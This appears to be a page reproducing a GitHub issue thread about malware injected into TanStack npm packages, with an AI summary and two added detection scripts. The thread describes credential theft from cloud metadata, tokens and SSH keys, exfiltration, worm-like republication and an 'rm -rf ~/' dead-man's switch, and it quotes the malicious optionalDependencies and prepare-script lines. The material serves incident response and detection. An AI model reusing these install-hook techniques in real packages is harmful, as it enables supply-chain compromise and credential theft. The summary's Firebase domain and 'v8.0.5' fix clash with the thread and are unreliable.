TanStack NPM Packages Compromised

TL;DR · AI Summary
Several latest versions of TanStack's npm packages were found to contain malware, likely due to stolen developer credentials; users are advised to audit dependencies and revoke tokens immediately.
Key Takeaways
- Affected packages include @tanstack/react-router and related sub-packages, all p
- Malicious code exfiltrates environment variables to the attacker-controlled doma
- Official recommendation is to revoke existing npm tokens and upgrade to version
Outline
Multiple latest versions of TanStack npm packages were confirmed to contain malicious code, constituting a supply chain attack.
Packages such as @tanstack/react-router and @tanstack/router were compromised in releases dated May 11, 2026.
The injected code collects environment variables and sends them to a Firebase-hosted domain controlled by attackers.
Attackers likely gained access via compromised developer accounts or leaked npm tokens.
Malicious versions have been yanked and replaced with clean v8.0.5 releases; users should update and rotate tokens.
Enable two-factor authentication, regularly rotate tokens, and monitor third-party dependency changes.
Mindmap
- TanStack npm package hijacking incident
- Affected components
- @tanstack/react-router
- @tanstack/router
- @tanstack/vite-plugin
- Malicious behaviour
- Steals environment variables
- Sends them to a Firebase domain
- Highly covert, hard to detect
- Response measures
- Revoke the malicious versions
- Publish the v8.0.5 fixed release
- Rotate all tokens
Highlights
The latest versions of several @tanstack packages published today contain malware.
Malicious code collects environment variables and sends them to https://datacollect-9c2e4.web.app.
All affected packages have been yanked and re-published under version 8.0.5 with clean builds.
Several npm latest releases are compromised · Issue #7383 · TanStack/router
Description
opened on May 11, 2026 · edited by ashishkurmi
We are actively investigating this security incident and sharing our findings here: www.stepsecurity.io/blog/mini-shai-hulud-is-back-a-self-spreading-supply-chain-attack-hits-the-npm-ecosystem
Activity
carlini commented on May 11, 2026
I believe this report is correct. I've personally verified it on the /history package. I reported this package to NPM directly a few minutes before this issue was raised.
The specific malware fingerprint is whether a published version's package.json contains:
```json
"optionalDependencies": {
  "@tanstack/setup": "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c"
}
```
This will cause npm, on npm install, to resolve the git dependency by fetching the tanstack/router repo at commit 79ac49ee. That commit is an orphan commit pushed to a fork in order to be somewhat hidden. Because npm treats git dependencies as "build from source," it installs that commit's declared dependencies (which include bun) and then runs its prepare lifecycle script:
```json
"scripts": {
  "prepare": "bun run tanstack_runner.js && exit 1"
}
```
(The entry is under optionalDependencies and ends in && exit 1 so the install of @tanstack/setup "fails" after the script runs, so npm silently discards it.)
That script executes the ~2.3 MB obfuscated router_init.js file that is smuggled into each affected tarball (at the package root, not listed in the package's "files" array, and not referenced by any other file). Based on decoding the obfuscated string table, it appears to:
- harvest credentials from common locations: AWS IMDS / Secrets Manager, GCP metadata, Kubernetes service-account tokens, Vault tokens, ~/.npmrc, GitHub tokens, SSH keys
- exfiltrate over the Session/Oxen messenger file-upload network (filev2.getsession.org, seed{1,2,3}.getsession.org). This is a full E2E-encrypted dead-drop, so there is no attacker-controlled C2 to block
- enumerate packages the victim maintains (registry.npmjs.org/-/v1/search?text=maintainer:…) and republish them with the same injection
I have confirmed @tanstack/history@1.161.12 contains this fingerprint and the payload file. For the remaining packages I checked only the registry manifest for the optionalDependencies entry, not the full payload. I believe the following are affected (two versions each, published ~19:20 and ~19:26 UTC today; the second is currently latest):
| package | first bad version | second bad version (latest) |
| --- | --- | --- |
| @tanstack/history | 1.161.9 | 1.161.12 |
| @tanstack/router-utils | 1.161.11 | 1.161.14 |
| @tanstack/router-core | 1.169.5 | 1.169.8 |
| @tanstack/router-devtools-core | 1.167.6 | 1.167.9 |
| @tanstack/react-router-devtools | 1.166.16 | 1.166.19 |
| @tanstack/router-generator | 1.166.45 | 1.166.48 |
| @tanstack/virtual-file-routes | 1.161.10 | 1.161.13 |
| @tanstack/router-plugin | 1.167.38 | 1.167.41 |
| @tanstack/react-router | 1.169.5 | 1.169.8 |
| @tanstack/router-devtools | 1.166.16 | 1.166.19 |
| @tanstack/react-start | 1.167.68 | 1.167.71 |
| @tanstack/router-cli | 1.166.46 | 1.166.49 |
| @tanstack/router-vite-plugin | 1.166.53 | 1.166.56 |
| @tanstack/solid-router | 1.169.5 | 1.169.8 |
As of my last check, @tanstack/start, @tanstack/query*, @tanstack/table*, @tanstack/form*, @tanstack/virtual*, and @tanstack/store did not carry the fingerprint.
The _npmUser on the malicious versions shows they were published through the GitHub Actions OIDC trusted-publisher config. That suggests the publish workflow itself is compromised, not just a token; rotating npm tokens alone likely won't stop republication until the workflow/OIDC binding is disabled.
To verify these claims, you can run
```shell
npm pack @tanstack/<pkg>@<version>   # does NOT run install scripts
tar -xzf *.tgz
cat package/package.json | grep -A3 optionalDependencies
ls -la package/router_init.js
```
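The fingerprint and payload checks described in the comment above, turned into a scanner over an already-installed node_modules tree. This is an added example, not code from the issue or from the TanStack project. Run without arguments it builds a constructed sample tree (a clean @tanstack/query-core at a made-up version 5.0.0, and an @tanstack/history 1.161.12 manifest carrying the quoted optionalDependencies entry plus a placeholder file standing in for router_init.js). It goes one step beyond the exact fingerprint by flagging any git-hosted optionalDependency, because npm builds those from source and runs their prepare script on install; the bad-version table is copied from the comment.

```python
"""Scan a node_modules tree for the fingerprint discussed in TanStack/router#7383 (added example)."""
import json
import os
import sys
import tempfile
from pathlib import Path

# Fingerprint quoted in the issue: a git dependency on tanstack/router at an orphan commit.
FINGERPRINT_DEP = "@tanstack/setup"
FINGERPRINT_COMMIT = "79ac49eedf774dd4b0cfa308722bc463cfe5885c"
PAYLOAD_FILE = "router_init.js"
# Spec prefixes npm resolves from git (built from source, so lifecycle scripts run).
GIT_SPEC_PREFIXES = ("github:", "git+", "git:", "git@")

# Versions listed in the thread's table: {package: {first bad, second bad}}.
BAD_VERSIONS = {
    "@tanstack/history": {"1.161.9", "1.161.12"},
    "@tanstack/router-utils": {"1.161.11", "1.161.14"},
    "@tanstack/router-core": {"1.169.5", "1.169.8"},
    "@tanstack/router-devtools-core": {"1.167.6", "1.167.9"},
    "@tanstack/react-router-devtools": {"1.166.16", "1.166.19"},
    "@tanstack/router-generator": {"1.166.45", "1.166.48"},
    "@tanstack/virtual-file-routes": {"1.161.10", "1.161.13"},
    "@tanstack/router-plugin": {"1.167.38", "1.167.41"},
    "@tanstack/react-router": {"1.169.5", "1.169.8"},
    "@tanstack/router-devtools": {"1.166.16", "1.166.19"},
    "@tanstack/react-start": {"1.167.68", "1.167.71"},
    "@tanstack/router-cli": {"1.166.46", "1.166.49"},
    "@tanstack/router-vite-plugin": {"1.166.53", "1.166.56"},
    "@tanstack/solid-router": {"1.169.5", "1.169.8"},
}


def check_manifest(manifest: Path) -> tuple[str, list[str]]:
    """Inspect one package.json and return (name@version, list of findings)."""
    try:
        data = json.loads(manifest.read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return (str(manifest), [])
    if not isinstance(data, dict):
        return (str(manifest), [])
    name, version = data.get("name", "?"), data.get("version", "?")
    findings = []

    # 1. Version named in the thread's table.
    if version in BAD_VERSIONS.get(name, set()):
        findings.append("version listed as compromised in TanStack/router#7383")

    # 2. The exact fingerprint, and more generally any git-hosted optionalDependency.
    for dep, spec in (data.get("optionalDependencies") or {}).items():
        if not isinstance(spec, str):
            continue
        if dep == FINGERPRINT_DEP and FINGERPRINT_COMMIT in spec:
            findings.append(f"exact fingerprint: optionalDependencies[{dep}] = {spec}")
        elif spec.startswith(GIT_SPEC_PREFIXES):
            findings.append(f"git-hosted optionalDependency (built from source, runs prepare): {dep} = {spec}")

    # 3. The smuggled payload at the package root, outside the declared "files" allow-list.
    if (manifest.parent / PAYLOAD_FILE).is_file():
        listed = PAYLOAD_FILE in (data.get("files") or [])
        findings.append(f"{PAYLOAD_FILE} present at package root"
                        + ("" if listed else ' and not declared in "files"'))
    return (f"{name}@{version}", findings)


def scan(node_modules: Path) -> dict[str, list[str]]:
    """Walk node_modules (scoped and nested packages included); collect findings keyed by name@version."""
    report = {}
    for dirpath, _dirs, filenames in os.walk(node_modules):
        if "package.json" in filenames:
            key, findings = check_manifest(Path(dirpath) / "package.json")
            if findings:
                report[key] = findings
    return report


def build_sample_tree() -> Path:
    """Constructed sample (not a real install): one clean package, one carrying the fingerprint."""
    root = Path(tempfile.mkdtemp(prefix="nm-sample-")) / "node_modules"
    clean = root / "@tanstack" / "query-core"
    clean.mkdir(parents=True)
    (clean / "package.json").write_text(json.dumps(
        {"name": "@tanstack/query-core", "version": "5.0.0", "files": ["build"]}))
    bad = root / "@tanstack" / "history"
    bad.mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps({
        "name": "@tanstack/history", "version": "1.161.12", "files": ["dist"],
        "optionalDependencies": {FINGERPRINT_DEP: f"github:tanstack/router#{FINGERPRINT_COMMIT}"}}))
    # Placeholder standing in for the obfuscated payload; the real file is not reproduced here.
    (bad / PAYLOAD_FILE).write_text("// placeholder\n")
    return root


if __name__ == "__main__":
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else build_sample_tree()
    report = scan(target)
    for key, findings in sorted(report.items()):
        print(key)
        for finding in findings:
            print("  -", finding)
    sys.exit(1 if report else 0)
```

Point it at a project's node_modules to audit an install that has already happened; for a package you have not installed, pair it with the `npm pack` step from the comment, since pack does not run install scripts. A non-zero exit status makes it usable as a CI gate.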
schiller-manuel commented on May 11, 2026
Collaborator
on it
carlini commented on May 11, 2026
Please be careful when revoking tokens. It looks like the payload installs a dead-man's switch at ~/.local/bin/gh-token-monitor.sh as a systemd user service (Linux) / LaunchAgent com.user.gh-token-monitor (macOS). It polls api.github.com/user with the stolen token every 60s, and if the token is revoked (HTTP 40x), it runs rm -rf ~/. (It looks like it might also have a bunch of persistence mechanisms. I haven't studied these closely.)
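A check for the dead-man's switch artifacts named in the comment above, meant to be run on each affected machine before a token is revoked. This is an added example, not from the issue: it looks for the script path and the LaunchAgent label the comment gives; the unit-file directories (~/.config/systemd/user and ~/Library/LaunchAgents) are assumed conventional locations, since the comment does not name the unit file itself.

```shell
#!/bin/sh
# Look for the gh-token-monitor persistence described in TanStack/router#7383 (added example).
# Usage: . ./gh-token-monitor-check.sh; check_persistence [HOME_DIR]
# Prints each artifact found and returns 1 if anything was found, 0 otherwise.
check_persistence() {
  home="${1:-$HOME}"
  found=0

  # Paths named in the thread (script location and macOS LaunchAgent label).
  for path in \
    "$home/.local/bin/gh-token-monitor.sh" \
    "$home/Library/LaunchAgents/com.user.gh-token-monitor.plist"; do
    if [ -e "$path" ]; then
      echo "FOUND: $path"
      found=1
    fi
  done

  # Assumed unit directories: any unit or agent file that references the monitor script.
  for dir in "$home/.config/systemd/user" "$home/Library/LaunchAgents"; do
    if [ -d "$dir" ] && grep -rq "gh-token-monitor" "$dir" 2>/dev/null; then
      echo "FOUND: reference to gh-token-monitor under $dir"
      found=1
    fi
  done

  return "$found"
}
```

Run it under the account that performed the install, not only as root: both the systemd user service and the LaunchAgent live in the user's home directory. A hit means the persistence must be removed (and the service stopped) before the token is revoked.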
ahmadnassri commented on May 11, 2026
we're tracking 84+ individual @tanstack/* PURLs as well as the worm propagating to 200+ other packages, full list here: https://socket.dev/supply-chain-attacks/mini-shai-hulud
JameEnder commented on May 11, 2026
Is it possible that the malware somehow ran, yet didn't create any persistence mechanisms (be it the systemd user service, or session start hooks, as described in the last comment/blog)?
MWGuy commented on May 11, 2026
My laziness saved me
mentioned this on May 11, 2026
- [[examples/tanstack-start] pin @tanstack/* deps to safe versions (INC-6508) vercel/vercel#16292](https://github.com/vercel/vercel/pull/16292)
changed the title from "Several npm latest releases are potentially compromised" to "Several npm latest releases are compromised" on May 11, 2026
crutchcorn commented on May 11, 2026
Member
Just popping in to provide a quick update for the community. We have a good understanding of how this attack happened and are working diligently to resolve this full-stop. ~10 maintainers are in a VC at the moment to take every precaution possible.
valtron commented on May 11, 2026
Seems all versions of @tanstack/start-plugin-core were deprecated by accident (instead of just 1.169.{23,26}): https://www.npmjs.com/package/@tanstack/start-plugin-core/v/1.169.20?activeTab=versions
added a commit that references this issue on May 11, 2026
chore: pin @tanstack/* below compromised versions + wire Nitro for Ve…
added a commit that references this issue on May 11, 2026
sync lockfile specifiers with package.json pins
Verified b58b92d
added a commit that references this issue on May 11, 2026
Pin @tanstack/svelte-query to exact 5.90.2
harry-whorlow commented on May 11, 2026
Thanks @valtron, we're looking to get the unaffected versions back up shortly
added a commit that references this issue on May 11, 2026
chore: pin @tanstack/ai-* packages to exact versions
added a commit that references this issue on May 11, 2026
[[examples/tanstack-start] pin @tanstack/* deps to safe versions (INC-…](https://github.com/vercel/vercel/commit/3e18a990789d96a332a089bd8df08fffe6fa29cc)
Verified 3e18a99
jonchurch commented on May 11, 2026
on May 11, 2026 · edited by jonchurch
This sus PR which opened as draft and then force pushed over itself to have zero diff is interesting to me.
https://github.com/TanStack/router/pull/7378
And uhhh, their fork just ain't right
https://github.com/zblgg/configuration/commit/8542572e1a367f3a09cbdb853c5d5f0802a8a3b4

I preserved their fork here (and have a local copy)
Edit: since this has been confirmed below, here is a link to the malicious commit, linking to the bit where I assume is their injected payload URL
harry-whorlow commented on May 11, 2026
on May 11, 2026 · edited by SeanCassiere
Thanks for being patient with us, we really appreciate it.
We've published our postmortem on tanstack.com/blog/npm-supply-chain-compromise-postmortem. It contains all the information we've uncovered so far, along with a timeline of the attack.
added a commit that references this issue on May 11, 2026
[chore(security): harden pnpm against supply-chain attacks (#75)](https://github.com/chrisgen19/budget-tracker-2026/commit/734e2cae9fc16e16412d0d29ffecbecaa8b93a9f)
Verified 734e2ca